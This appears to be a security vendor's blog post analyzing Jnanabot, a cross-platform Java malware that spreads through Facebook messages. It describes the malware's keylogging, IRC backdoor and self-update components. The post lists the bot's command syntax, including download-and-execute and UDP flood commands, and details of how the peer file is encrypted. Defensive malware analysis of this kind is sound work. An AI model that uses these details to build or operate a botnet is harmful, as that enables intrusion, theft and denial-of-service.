Jnanabot is extensive in its scope of infection and has a wide variety of functions. The main vector of its propagation is through the social networking website Facebook. But apart from that Jnanabot also has an array of components meshed together to perform different tasks, such as a key logging component to steal information;an IRC component to control the compromised computer from a remote computer; capabilities to update itself; and most of all the ability to infect users across multiple platforms, namely Mac OSX, Windows, and Linux.
My previous blog describes in brief the different components of Jnanabot. Further analysis revealed various details about the components.
It is the prime component of Jnanabot. It is responsible for sending messages to all friends on the user’s profile with a malicious link, which is the main propagation vector of the threat. The sample that we analyzed posts the following message:
It uses AJAX calls to perform its operations on Facebook. To start with, it searches for cookies of a logged-in Facebook user to authenticate itself. It then uses the following AJAX query to search for friends on the user’s profile:
The threat now iterates through the user’s friend’s list and sends them the above message using 4 different AJAX queries.
Users who have clicked on such a messageand have reports of their friends receiving such messages from their Facebook mailbox should consider their computer infected. See here for removal instructions.
This is the backdoor component of Jnanabot andit waits for commands from the master to perform specific actions on the compromised computer. The malware writer has used the source code of the Hacksoft Botnet, which is freely available on underground communities, to develop this module. The botnet is built in Java. A crafty choice by the author given that his/her code is also written in Java. Thus fulfilling the purpose of having a seamless integration to the code as well as being platform independent. Some of the commands this bot accepts are as follows:
- .download [URL] [LOCAL FILE NAME] <execute>
- .sflood [HOST] [PORT] [THREADS] [DELAY] [CONNECTIONS]
- .screenshot [SECONDS] [LOCAL FILE]
- .spam [SERVER] [PORT] [CHANNEL] [CHANNEL PASSWORD (optional)]
- .mkdir [DIR]
As you can see from the commands the threat is capable of performing a DDOS attack using udpflood, download and execute files from a remote location, capture screenshots, and send spam messages to a server.
As explained in my previous blog, this is the component that controls all other components. It has a list of URLs from where it downloads the file applet_hosts.txt. The hosts on this file are further used to download additional components for the threat.
The threat also has other ways to update and propagate itself. The threat downloads a file named “pex.bsl”. From our analysis of the threat, the file contains the host names of the peers to update the files. The file pex.bsl is encrypted with the algorithm PBEWithMD5AndDES, which is a password based encryption. The password for decryption is also hardcoded in the file. It also generates a random port number between 1024 and 65535 to connect to those domains; the default port number is 20632.
We are currently investigating this module and will post a follow up blog when the information is available.
Facebook users are advised to be judicious while browsing and to avoid clicking of suspicious links even though the links are posted/messaged by friends.
Special thanks to Mario Ballano for his technical assistance.